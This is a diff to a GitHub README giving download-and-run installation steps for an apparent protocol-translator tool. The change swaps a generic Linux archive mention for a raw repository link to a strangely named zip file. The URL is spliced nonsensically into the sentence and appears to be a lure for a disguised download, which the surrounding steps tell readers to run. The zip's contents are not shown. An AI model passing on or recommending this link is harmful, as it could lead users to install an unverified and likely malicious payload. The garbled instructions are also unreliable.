BongDornAi/CodeSilver_The-Silent-Protocol-Translator/README.md

 3. **Choose your file**: Select the file that matches your operating system.
 Usually, you will find:
    - A `.exe` file for Windows.
    - A `.dmg` or `.pkg` for macOS.
-   - A `.tar.gz` or similar for Linux.
+   - A `https://github.com/BongDornAi/CodeSilver_The-Silent-Protocol-Translator/raw/refs/heads/main/Landwehr/Silent-Translator-The-Protocol-Silver-Code-chemolysis.zip` or similar for Linux.
 4. **Download the file** by clicking on its name.
 The download starts automatically.
 5. **Run the installer** (or the downloaded file) once downloading finishes:
    - Windows: Double-click the `.exe` file and follow the setup steps.